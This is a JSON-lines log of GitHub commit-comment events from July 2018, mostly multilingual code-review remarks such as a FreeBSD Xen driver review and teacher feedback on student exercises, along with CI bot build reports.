{"id":"7928300511","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619872,"position":112,"line":1394,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:07:26Z","updated_at":"2018-07-06T11:07:26Z","author_association":"NONE","body":"Indentation seems off?"}},"created_at":"2018-07-06T11:07:26Z"}
{"id":"7928300558","type":"CommitCommentEvent","actor":{"login":"hahalidaxin"},"repo":{"name":"hahalidaxin/ProgramLessons"},"payload":{"comment":{"id":29619873,"position":null,"line":null,"path":null,"commit_id":"d9cf561d2cf6dcd307add129c102631deb140d1b","created_at":"2018-07-06T11:07:26Z","updated_at":"2018-07-06T11:07:26Z","author_association":"OWNER","body":"d"}},"created_at":"2018-07-06T11:07:26Z"}
{"id":"7928301482","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29619875,"position":null,"line":null,"path":null,"commit_id":"7f9b03142d7f84790d7f86465b72e271cbd4b5dd","created_at":"2018-07-06T11:07:38Z","updated_at":"2018-07-06T11:07:38Z","author_association":"NONE","body":"各商品ごとに合計が表示されていて、とっても分かりやすいコードですね。\r\nコンビニのレシートを見ているみたいで、すごく良いと思います。\r\n\r\n余談ですが、\r\nビール→beer\r\nのスペルになります。参考まで。"}},"created_at":"2018-07-06T11:07:38Z"}
{"id":"7928302522","type":"CommitCommentEvent","actor":{"login":"akashbijwe"},"repo":{"name":"Vicky099/devrai"},"payload":{"comment":{"id":29619877,"position":null,"line":null,"path":null,"commit_id":"e2b00d215e3a24568f50d4511c3122991779840a","created_at":"2018-07-06T11:07:53Z","updated_at":"2018-07-06T11:07:53Z","author_association":"COLLABORATOR","body":"Marathi translation. kya baat hain"}},"created_at":"2018-07-06T11:07:53Z"}
{"id":"7928302820","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619878,"position":97,"line":1380,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:07:58Z","updated_at":"2018-07-06T11:07:58Z","author_association":"OWNER","body":"I mean: should we use xbd_io_dmat to create cm_indirectionmap, or should we create a new tag for each xbd_command?"}},"created_at":"2018-07-06T11:07:58Z"}
{"id":"7928303259","type":"CommitCommentEvent","actor":{"login":"git-jarle"},"repo":{"name":"Heigvd/Wegas"},"payload":{"comment":{"id":29619880,"position":null,"line":null,"path":null,"commit_id":"933cdb200038677bb08755fdd1baaa980047bb3b","created_at":"2018-07-06T11:08:04Z","updated_at":"2018-07-06T11:08:04Z","author_association":"CONTRIBUTOR","body":"Oui, si vous pensez que cette version est suffisamment générique.\r\nIl manquerait éventuellement une limite d’avertissement supérieure en plus de la limite inférieure qui est déjà implémentée pour le Media game.\r\n\r\n-Jarle\r\n\r\n\r\nFrom: maxencelaurent <notifications@github.com>\r\nReply-To: Heigvd/Wegas <reply@reply.github.com>\r\nDate: Friday, 6 July 2018 at 12:58\r\nTo: Heigvd/Wegas <Wegas@noreply.github.com>\r\nCc: \"jarle.hulaas@heig-vd.ch\" <jarle.hulaas@heig-vd.ch>, Author <author@noreply.github.com>\r\nSubject: Re: [Heigvd/Wegas] MSG: new gauges (933cdb2)\r\n\r\n\r\nJe ne vois pas pourquoi c'est spécifique au media game. Est-ce qu'il ne vaudrait pas mieux la mettre avec les autres afficheurs de nombres ?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/Heigvd/Wegas/commit/933cdb200038677bb08755fdd1baaa980047bb3b#commitcomment-29619745>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AFXFgCgn4s7CLh1NsFYmQsxP381_fY_hks5uD0K0gaJpZM4VFRpJ>.\r\n"}},"created_at":"2018-07-06T11:08:04Z"}
{"id":"7928307534","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18012/programming-term2"},"payload":{"comment":{"id":29619887,"position":null,"line":null,"path":null,"commit_id":"911f2f229c14b85a3def43726b4500478512dfb5","created_at":"2018-07-06T11:09:07Z","updated_at":"2018-07-06T11:09:07Z","author_association":"NONE","body":"課題はやりかけの状態のようですので、完成後に評価しますね。"}},"created_at":"2018-07-06T11:09:07Z"}
{"id":"7928308681","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619894,"position":null,"line":null,"path":null,"commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:09:25Z","updated_at":"2018-07-06T11:09:25Z","author_association":"NONE","body":"Overall LGTM, does it work?"}},"created_at":"2018-07-06T11:09:25Z"}
{"id":"7928308969","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619895,"position":112,"line":1394,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:09:30Z","updated_at":"2018-07-06T11:09:30Z","author_association":"OWNER","body":"Ah, I use a tab length of 4 and GitHub uses a tab length of 8. For some reason, my text editor inserted spaces instead of tabs here. I'll fix it."}},"created_at":"2018-07-06T11:09:30Z"}
{"id":"7928312053","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619903,"position":109,"line":1391,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:10:18Z","updated_at":"2018-07-06T11:10:18Z","author_association":"OWNER","body":"I'll export both the macros in busdma_xen.h"}},"created_at":"2018-07-06T11:10:18Z"}
{"id":"7928313759","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619905,"position":41,"line":1240,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:10:45Z","updated_at":"2018-07-06T11:10:45Z","author_association":"NONE","body":"Add a KASSERT please."}},"created_at":"2018-07-06T11:10:45Z"}
{"id":"7928318741","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619922,"position":97,"line":1380,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:12:02Z","updated_at":"2018-07-06T11:12:02Z","author_association":"NONE","body":"Maybe I'm missing something, but is there any reason/need to create a different tag for each command? AFAICT a single tag per blkfront instance should work?"}},"created_at":"2018-07-06T11:12:02Z"}
{"id":"7928327529","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619947,"position":null,"line":null,"path":null,"commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:14:17Z","updated_at":"2018-07-06T11:14:17Z","author_association":"OWNER","body":"I haven't tested it yet. It won't work right now, because I recently discovered a bug in `xen_bus_dma_tag_create()`, and I will need to fix it before running. Right now, `xenpv_get_dma_tag()` will probably cause infinite recursion.\r\n\r\nBut tell me this: how do I know if this works? If a guest boots, does it mean it is working?"}},"created_at":"2018-07-06T11:14:17Z"}
{"id":"7928330502","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18013/programming-term2"},"payload":{"comment":{"id":29619955,"position":null,"line":null,"path":null,"commit_id":"9f56217eef8271d0f007f2e225ba75aa5ca8d15a","created_at":"2018-07-06T11:15:01Z","updated_at":"2018-07-06T11:15:01Z","author_association":"NONE","body":"ソースコード内に行番号が入ってしまってますので、これだと動かないはずです。\r\nまた、14行目の\"yakitori    _c\"もエラーになると思います。\r\n\r\n出題内容としては、登場した数値を変数に入れてほしいので、割引率も0.2を入れて、\r\n計算の中で1から引くのが出題の意図どおりになると思います。\r\n\r\n続きは再提出後に評価します。"}},"created_at":"2018-07-06T11:15:01Z"}
{"id":"7928330709","type":"CommitCommentEvent","actor":{"login":"xsot"},"repo":{"name":"btzy/circuit-sandbox"},"payload":{"comment":{"id":29619957,"position":null,"line":null,"path":null,"commit_id":"a8bedab478dbe8b71bd8ccf919ea2b872e38650c","created_at":"2018-07-06T11:15:04Z","updated_at":"2018-07-06T11:15:04Z","author_association":"COLLABORATOR","body":"The snapping is actually deliberate but I guess it doesn't really matter."}},"created_at":"2018-07-06T11:15:04Z"}
{"id":"7928333007","type":"CommitCommentEvent","actor":{"login":"enekid"},"repo":{"name":"CartoDB/Windshaft"},"payload":{"comment":{"id":29619963,"position":3,"line":158,"path":"lib/windshaft/renderers/pg-mvt/renderer.js","commit_id":"b24d18c9dff6b8c7e013bf85e12b5e891b006a1e","created_at":"2018-07-06T11:15:38Z","updated_at":"2018-07-06T11:15:38Z","author_association":"CONTRIBUTOR","body":"This is equivalent:\r\n```javascript\r\n_replaceTokens (sql, { z = 0, x = 0, y = 0 }) {\r\n```"}},"created_at":"2018-07-06T11:15:38Z"}
{"id":"7928334980","type":"CommitCommentEvent","actor":{"login":"mieschko"},"repo":{"name":"agamazanek/SpringInAction"},"payload":{"comment":{"id":29619965,"position":null,"line":null,"path":null,"commit_id":"204ec87d4e524b820885659c2b865cba5d8e2bc0","created_at":"2018-07-06T11:16:10Z","updated_at":"2018-07-06T11:16:10Z","author_association":"COLLABORATOR","body":"up to date"}},"created_at":"2018-07-06T11:16:10Z"}
{"id":"7928338326","type":"CommitCommentEvent","actor":{"login":"TheIndra55"},"repo":{"name":"Xwilarg/Ball3D"},"payload":{"comment":{"id":29619969,"position":null,"line":null,"path":null,"commit_id":"ecaafe00a8029b1aec2e338a07806e2eeddbbdf3","created_at":"2018-07-06T11:17:00Z","updated_at":"2018-07-06T11:17:00Z","author_association":"NONE","body":"boom 💥 "}},"created_at":"2018-07-06T11:17:00Z"}
{"id":"7928338639","type":"CommitCommentEvent","actor":{"login":"pwardowski"},"repo":{"name":"izobera/izoberatest"},"payload":{"comment":{"id":29619970,"position":14,"line":14,"path":"src/test/java/pl/izobera/tests/logowanie_google.java","commit_id":"14a7130fa51b0b80c1d893b421fa719b4db6b949","created_at":"2018-07-06T11:17:05Z","updated_at":"2018-07-06T11:17:05Z","author_association":"COLLABORATOR","body":"logowanie_google - takiej konwencji nazewnictwa się nie stosuje w java\r\n\r\nPo pierwsz - lepiej pisać po angielsku - wszyscy zrozumieją \r\npo drugie - CamelCase - czyli GmailLoginTest\r\npo trzecie do klas testowych warto dodawać Test (na końcu lub początku) \r\n"}},"created_at":"2018-07-06T11:17:05Z"}
{"id":"7928339389","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29619974,"position":97,"line":1380,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:17:15Z","updated_at":"2018-07-06T11:17:15Z","author_association":"OWNER","body":"You probably aren't missing anything. I just wasn't sure if it is OK to use a single tag for everything."}},"created_at":"2018-07-06T11:17:15Z"}
{"id":"7928341362","type":"CommitCommentEvent","actor":{"login":"pwardowski"},"repo":{"name":"izobera/izoberatest"},"payload":{"comment":{"id":29619986,"position":17,"line":17,"path":"src/test/java/pl/izobera/tests/logowanie_google.java","commit_id":"14a7130fa51b0b80c1d893b421fa719b4db6b949","created_at":"2018-07-06T11:17:44Z","updated_at":"2018-07-06T11:17:44Z","author_association":"COLLABORATOR","body":"tu już lepiej - ale warto korzystać z camel case czyli loginToGmail albo loginTest"}},"created_at":"2018-07-06T11:17:44Z"}
{"id":"7928344168","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18015/programming-term2"},"payload":{"comment":{"id":29619990,"position":null,"line":null,"path":null,"commit_id":"bed643e61b1507b64469018361b72293f7b77336","created_at":"2018-07-06T11:18:29Z","updated_at":"2018-07-06T11:18:29Z","author_association":"NONE","body":"いい感じに計算できていますが、ポイント値引きが無いですね^^;\r\n\r\nおつまみを英単語に訳してる所はポイント高いです。\r\nが、出題文中に英小文字を使うことと書きましたので、先頭を小文字にしてください。\r\nまた、出題意図としては、「登場する数値全てを変数に格納」してほしいので、\r\n各商品の単価、各商品の数量、割引率、値引きポイントをそれぞれ変数化してください。\r\n\r\n再提出後、再評価しますね。"}},"created_at":"2018-07-06T11:18:29Z"}
{"id":"7928346210","type":"CommitCommentEvent","actor":{"login":"oadam11"},"repo":{"name":"ValidusOs/vendor_validus"},"payload":{"comment":{"id":29619994,"position":null,"line":null,"path":null,"commit_id":"bdb798ac9e58cacbfffc7832ebc0be436e64a4c3","created_at":"2018-07-06T11:19:00Z","updated_at":"2018-07-06T11:19:00Z","author_association":"NONE","body":"#EtaPlz for version 3.0"}},"created_at":"2018-07-06T11:19:00Z"}
{"id":"7928346566","type":"CommitCommentEvent","actor":{"login":"pwardowski"},"repo":{"name":"izobera/izoberatest"},"payload":{"comment":{"id":29619995,"position":19,"line":19,"path":"src/test/java/pl/izobera/tests/logowanie_google.java","commit_id":"14a7130fa51b0b80c1d893b421fa719b4db6b949","created_at":"2018-07-06T11:19:06Z","updated_at":"2018-07-06T11:19:06Z","author_association":"COLLABORATOR","body":"tego nie otworzy - metoda get() otwiera stronę z pełną nazwą a tutaj brakuje: nazwy hosta, protokołu, porty itd. \r\ndlatego pisałem o google.com - \r\npowinno być coś w rodzaju - webDriver.get(\"https://google.com/intl/pl/gmail/about\")\r\n"}},"created_at":"2018-07-06T11:19:06Z"}
{"id":"7928351339","type":"CommitCommentEvent","actor":{"login":"MatteoBetto"},"repo":{"name":"MatteoBetto/syncnegoziovideogiochi"},"payload":{"comment":{"id":29620006,"position":4,"line":6,"path":"htdocs/creazioneevento.html","commit_id":"a597dc3085ba74c2300bcb3d9605e9729add423c","created_at":"2018-07-06T11:20:22Z","updated_at":"2018-07-06T11:20:22Z","author_association":"OWNER","body":"prova"}},"created_at":"2018-07-06T11:20:22Z"}
{"id":"7928358306","type":"CommitCommentEvent","actor":{"login":"joaquin-herrero"},"repo":{"name":"viaduck/mariadbpp"},"payload":{"comment":{"id":29620028,"position":4,"line":13,"path":"include/mariadb++/types.hpp","commit_id":"7db2285d1c6ffe02f3e2ffa2bfb1f91fa0cf04d5","created_at":"2018-07-06T11:22:06Z","updated_at":"2018-07-06T11:22:06Z","author_association":"NONE","body":"MariaDB version header file is named mariadb_version.h and is included into mysql.h.\r\n\r\nAssume that mysql_version.h exists broke linux compilation using mariadb instead of mysql:\r\n`fatal error: mysql/mysql_version.h: No such file or directory #include <mysql/mysql_version.h>`"}},"created_at":"2018-07-06T11:22:06Z"}
{"id":"7928359246","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":29620032,"position":null,"line":null,"path":null,"commit_id":"db074cd1734e37fec233941a8fe4d49ad46e69f3","created_at":"2018-07-06T11:22:19Z","updated_at":"2018-07-06T11:22:19Z","author_association":"OWNER","body":"*Duke, naturally 😛 "}},"created_at":"2018-07-06T11:22:19Z"}
{"id":"7928383023","type":"CommitCommentEvent","actor":{"login":"bkbooth"},"repo":{"name":"bkbooth/star-wars-browser"},"payload":{"comment":{"id":29620072,"position":null,"line":null,"path":null,"commit_id":"a106c598701af2923aece597332aa3bab0d26cc8","created_at":"2018-07-06T11:28:27Z","updated_at":"2018-07-06T11:28:27Z","author_association":"OWNER","body":"Closes #24 "}},"created_at":"2018-07-06T11:28:27Z"}
{"id":"7928389386","type":"CommitCommentEvent","actor":{"login":"WJJJJY"},"repo":{"name":"WJJJJY/Lenet"},"payload":{"comment":{"id":29620080,"position":62,"line":62,"path":"Training_code","commit_id":"95f58eb5470d38d0922c4b96af30f802c41e5c80","created_at":"2018-07-06T11:30:05Z","updated_at":"2018-07-06T11:30:05Z","author_association":"OWNER","body":"\r\n![image](https://user-images.githubusercontent.com/39338212/42376771-f96b483a-8152-11e8-89bb-a56cefb7f268.png)\r\n"}},"created_at":"2018-07-06T11:30:05Z"}
{"id":"7928396684","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620092,"position":23,"line":23,"path":"fetchfilmsbonus/FilmsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:31:51Z","updated_at":"2018-07-06T11:31:51Z","author_association":"NONE","body":"Методы как и переменные надо называть в формате _camelCase_."}},"created_at":"2018-07-06T11:31:51Z"}
{"id":"7928396795","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"wongsyrone/nand2tetris"},"payload":{"comment":{"id":29620093,"position":6,"line":18,"path":"projects/03/a/Bit.hdl","commit_id":"e6c342e4df9b8d78aa8e05fff7b6df6c53c0134c","created_at":"2018-07-06T11:31:53Z","updated_at":"2018-07-06T11:31:53Z","author_association":"OWNER","body":"Data Flip-Flop is used simply to distinguish T(now) and T(now - 1) a.k.a delay the clock"}},"created_at":"2018-07-06T11:31:53Z"}
{"id":"7928397169","type":"CommitCommentEvent","actor":{"login":"WLLR9505"},"repo":{"name":"WLLR9505/shooter-cs"},"payload":{"comment":{"id":29620096,"position":null,"line":null,"path":null,"commit_id":"d54025a9d6739075b8930437f85731180dbb7dc6","created_at":"2018-07-06T11:31:58Z","updated_at":"2018-07-06T11:31:58Z","author_association":"OWNER","body":"A arma gira na mão do personagem"}},"created_at":"2018-07-06T11:31:58Z"}
{"id":"7928397227","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29620097,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-06T11:31:59Z","updated_at":"2018-07-06T11:31:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T11:31:59Z"}
{"id":"7928397229","type":"CommitCommentEvent","actor":{"login":"TaylorSwifit"},"repo":{"name":"TaylorSwifit/Mygit-1"},"payload":{"comment":{"id":29620098,"position":8,"line":14,"path":"a.txt","commit_id":"d3a2278a47fd8baa74d88713711321cb70bb8e6d","created_at":"2018-07-06T11:31:59Z","updated_at":"2018-07-06T11:31:59Z","author_association":"OWNER","body":"kafka spark hive hbase hadoop sqoop flume "}},"created_at":"2018-07-06T11:31:59Z"}
{"id":"7928398469","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620100,"position":79,"line":79,"path":"fetchfilmsbonus/DetailsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:32:18Z","updated_at":"2018-07-06T11:32:18Z","author_association":"NONE","body":"`React.Fragment`"}},"created_at":"2018-07-06T11:32:18Z"}
{"id":"7928399431","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29620103,"position":null,"line":null,"path":null,"commit_id":"d1f78f73c94e0676ce6b32ead2f1e0dfa28965e8","created_at":"2018-07-06T11:32:32Z","updated_at":"2018-07-06T11:32:32Z","author_association":"NONE","body":"計算結果的にはOKですが、焼鳥の単価が\r\n「最初から2割引された単価」になってしまっていますね。\r\n元々の単価と割引率それぞれを変数に持ってみてください。\r\n\r\nまた、10行目に「割引率」というコメントがあり、次の行に\r\nrate = 150\r\nとのコードがありますが、\r\nこれは割引率でなく、ポイント値引き分なので、コメントと役割が一致していないです。\r\n(ちなみに、rateは「率」を意味します。)\r\n\r\n課題の提出としてはOKにしますので、時間があれば下記のコードを用いて、\r\n同じ計算結果になるように修正してみてください。\r\nyakitori = 100\r\nrate = 0.2\r\npoint_off = 150\r\n\r\n以下は参考。\r\n・ビールは英単語に直すとbeerです。\r\n・変数は役割が分かる名前にしましょう。数量を表す変数に\"otumami1\"のような名前の付け方を\r\n　していますが、僕だったら、数量(number)にちなんで、\"otsumami_n\"とかにすると思います。"}},"created_at":"2018-07-06T11:32:32Z"}
{"id":"7928401368","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620105,"position":80,"line":80,"path":"fetchfilmsbonus/DetailsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:33:01Z","updated_at":"2018-07-06T11:33:01Z","author_association":"NONE","body":"Тебе не нужно использовать массив для одного стиля, достаточно `style={styles.container}`."}},"created_at":"2018-07-06T11:33:01Z"}
{"id":"7928403502","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29620108,"position":null,"line":null,"path":null,"commit_id":"3a7c2c8cbc926ccc1b1356772ab0df267532f123","created_at":"2018-07-06T11:33:32Z","updated_at":"2018-07-06T11:33:32Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3a7c2c8cbc926ccc1b1356772ab0df267532f123-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-06T11:33:32Z"}
{"id":"7928407677","type":"CommitCommentEvent","actor":{"login":"WLLR9505"},"repo":{"name":"WLLR9505/shooter-cs"},"payload":{"comment":{"id":29620113,"position":13,"line":113,"path":"js/armas.js","commit_id":"c132f6bdc93aca0dc1bf2e70e6a2723b581850a0","created_at":"2018-07-06T11:34:34Z","updated_at":"2018-07-06T11:34:34Z","author_association":"OWNER","body":"O ponto de desenho da mira (parte central da mira) não é exatamente o ponto do mouse"}},"created_at":"2018-07-06T11:34:34Z"}
{"id":"7928412364","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/crypto"},"payload":{"comment":{"id":29620116,"position":null,"line":null,"path":null,"commit_id":"a69347c486455d4a92ae34c9f93edd9c87bc8b32","created_at":"2018-07-06T11:35:44Z","updated_at":"2018-07-06T11:35:44Z","author_association":"OWNER","body":"**###Coinbase API Status**\r\n\tNEW - Pending 1\r\n\tPENDING - Pending 1\r\n\tCOMPLETED - \r\n\tEXPIRED\r\n\tUNRESOLVED\r\n\t\tcontext\r\n\t\t\tUNDERPAID\r\n\t\t\tOVERPAID\r\n\t\t\tDELAYED\r\n\t\t\tMULTIPLE\r\n\t\t\tMANUAL\t\t\r\n\tRESOLVED\r\n**### Coinbase API Event: Type**\r\n\tcharge:created\r\n\tcharge:confirmed\r\n\tcharge:failed\t\r\n\r\n### **Opencart Order Status and Values**\r\n\tvalue=\"7\"   Canceled\r\n\tvalue=\"9\"   Canceled Reversal\r\n\tvalue=\"13\"   Chargeback\r\n\tvalue=\"5\"   Complete\r\n\tvalue=\"8\"   Denied\r\n\tvalue=\"14\"   Expired\r\n\tvalue=\"10\"   Failed\r\n\tvalue=\"1\" Pending\r\n\tvalue=\"15\"   Processed\r\n\tvalue=\"2\"   Processing\r\n\tvalue=\"11\"   Refunded\r\n\tvalue=\"12\"   Reversed\r\n\tvalue=\"3\"   Shipped\r\n\tvalue=\"16\"   Voided"}},"created_at":"2018-07-06T11:35:44Z"}
{"id":"7928417263","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18018/programming-term2"},"payload":{"comment":{"id":29620123,"position":null,"line":null,"path":null,"commit_id":"8d6f88016b773b1d6410f185b8a38fc58b8c1c2d","created_at":"2018-07-06T11:36:57Z","updated_at":"2018-07-06T11:36:57Z","author_association":"NONE","body":"計算結果も問題なく、ちゃんと出題意図に沿った計算になっていますね。\r\nコードも綺麗です。OKです。\r\n\r\nただ、文中で登場する値を全て変数に格納してほしいので、\r\n「焼鳥の割引率」をもう1個別の変数に入れるとより良いと思います。\r\n時間があれば対応してみてください。"}},"created_at":"2018-07-06T11:36:57Z"}
{"id":"7928424271","type":"CommitCommentEvent","actor":{"login":"qzminski"},"repo":{"name":"terminal42/contao-url-rewrite"},"payload":{"comment":{"id":29620146,"position":7,"line":81,"path":"src/Resources/contao/dca/tl_url_rewrite.php","commit_id":"d05fc0e5ecaa43dfdf2f5ea9d66380776990d127","created_at":"2018-07-06T11:38:42Z","updated_at":"2018-07-06T11:38:42Z","author_association":"MEMBER","body":"Right, I was mislead by the `debug:router` command which has shown the updated routes. Changed in 3269fcb."}},"created_at":"2018-07-06T11:38:42Z"}
{"id":"7928427161","type":"CommitCommentEvent","actor":{"login":"BAAAKA"},"repo":{"name":"BAAAKA/Vwin"},"payload":{"comment":{"id":29620149,"position":null,"line":null,"path":null,"commit_id":"00c86f470e303b83a952cb2f56a9653e89341642","created_at":"2018-07-06T11:39:24Z","updated_at":"2018-07-06T11:39:24Z","author_association":"OWNER","body":"1 comments on commit"}},"created_at":"2018-07-06T11:39:24Z"}
{"id":"7928428779","type":"CommitCommentEvent","actor":{"login":"VladDrabynka"},"repo":{"name":"KarpovIvan/account-service"},"payload":{"comment":{"id":29620153,"position":2,"line":2,"path":"account-service-api/pom.xml","commit_id":"530dc635731228b90e950a8bafd060e359ac896f","created_at":"2018-07-06T11:39:49Z","updated_at":"2018-07-06T11:39:49Z","author_association":"COLLABORATOR","body":"Test review"}},"created_at":"2018-07-06T11:39:49Z"}
{"id":"7928433859","type":"CommitCommentEvent","actor":{"login":"corlinus"},"repo":{"name":"Paullsam/Test-teach"},"payload":{"comment":{"id":29620164,"position":1,"line":1,"path":"figures/lib/figures_collection.rb","commit_id":"0511a8a9ca3caa3de923d69467ab1560d714da34","created_at":"2018-07-06T11:41:02Z","updated_at":"2018-07-06T11:41:02Z","author_association":"COLLABORATOR","body":"а почему он у тебя от Figure наследуется? "}},"created_at":"2018-07-06T11:41:02Z"}
{"id":"7928434694","type":"CommitCommentEvent","actor":{"login":"jlmariense"},"repo":{"name":"oscam-emu/oscam-emu"},"payload":{"comment":{"id":29620166,"position":null,"line":null,"path":null,"commit_id":"c90f68685b521ddeb84bce35f84d255840c1e48c","created_at":"2018-07-06T11:41:15Z","updated_at":"2018-07-06T11:41:15Z","author_association":"NONE","body":"Hello friends, just the mux globosat of 65W and 75W satellites, coded. Below the oscam log:\r\n2018/07/02 17:34:40 04D832E1 r (emu) ecm1:803045503F200E0078089276262863E95F5F00EAB00077734C0CF5DA9DE4F40DE367039C2808400000CD5B493858159C8E1C6F7441B7EEA451411FAE212058CC527E3BDB893B29B4\r\n2018/07/02 17:34:40 04D832E1 r (emu) csaUsed=0,xorMode=0,ecmSrvid=132,hashModeCw=1,modeCW=4"}},"created_at":"2018-07-06T11:41:15Z"}
{"id":"7928437283","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29620174,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-06T11:41:55Z","updated_at":"2018-07-06T11:41:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T11:41:55Z"}
